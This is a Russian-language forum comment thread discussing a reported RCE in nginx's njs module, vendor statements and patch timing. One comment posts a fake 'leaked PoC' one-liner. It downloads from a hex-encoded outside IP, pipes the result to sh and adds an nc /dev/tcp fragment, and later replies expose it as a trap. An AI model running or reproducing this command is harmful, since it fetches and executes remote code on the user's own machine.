updated: Zero-Click Server-Side RCE в njs

[easty]

Вот сейчас страшно. Рце в нжингсе и если пок реален и прост, будет весело.

[SadLion]

Если опубликуют подробности будет в любом случае весело, ведь сколько не обновлённых инстансов останется.

[karavan_750]

Если в статье речь исключительно о 1.16-1.17, то риску подвержены только недавние инсталляции.

[rogoz]

Он же open source, в каком-нибудь коммите засветится.

[q2digger]

не обновленных инстансов, докер-контейнеров, которые даже обновлять-то никто не подумает. волосы реально шевелятся. нас ждут увлекательные истории после публикации деталей

[crea7or]

NGINX
Replying to alisaesage
Thank you Alisa and ZDI for the report.

ZDI-CAN-8296 & ZDI-CAN-8495 are tracked as t.co/NhLhrM26cJ and t.co/2wVIv6rN0N ZDI-CAN-8296 was fixed in the nJS 0.3.2 release, and ZDI-CAN-8495 will be fixed in 0.3.3. Neither bug appears to be generally exploitable.

[jo1n]

CVSS Base Score понизили с 8.1 до 7.4 и Attack Vector сменили на Local.

[helgihabr]

Это касается модуля njs. Так что, не очень-то и страшно.
Интересно, насолько этот модуль популярен.

[Zolg]

"искусство писать заголовки"

[ky0]

она давно зарекомендовала себя как отличный специалист (и даже находится в санкционном списке)

Поясните, плз, как между собой коррелируют эти два факта и о каком списке идёт речь?

[Alesh]

Всем боятся 3 недели) "Алисе" респект.

[lega]

Не nginx, а njs, не уязвимость, а просто баг (уже пофикшен в последней версии) — компания Nginx отписалась, что этот баг не может быть использован как уязвимость.
Вообщем шум не очем.

[Scratch]

Утекло. Не проверял

LEAKED: nginx 1.x PoC on-liner. Null-byte RCE overflow in nginx BLT/Stream

curl -gsS victim.server.here/../../../%00/n…\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

[symbix]

На первый взгляд похоже на f6234460852a в njs.

[symbix]

А, дошло :-))

[w0den]

Я бы убрал |sh; nc /dev/tcp/localhost, иначе «PoC» может сработать даже если на сервере жертвы не установлен nginx (причём сервер жертвы, явно не удалённая машина).

[Scf]

curl 0x0238f06a

Забавно, чего только в линукс не вкручивают.

[w0den]

В Windows тоже работает:
C:\Windows\System32>ping 0x0238f06a

Pinging 2.56.240.106 with 32 bytes of data:
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56

Да и в браузере тоже: http://0x0238f06a/

[isden]

Так это же просто IP в hex форме.

[w0den]

Всё верно. С тем же успехом можно написать http://37285994/

[Zolg]

Так толсто, что прям тонко

[redsh0927]

nginx — это же вроде бы опенсорс? Какой смысл в 90-дневном неразглашении, если после выхода патча всё станет ясно?

[esc]

Так 90 дней на выход патча и дают, могут и раньше поправить.

[Bonio]

Так значит в самом nginx нет уязвимости, и если не используешь этот модуль, можно срочно все не обновлять?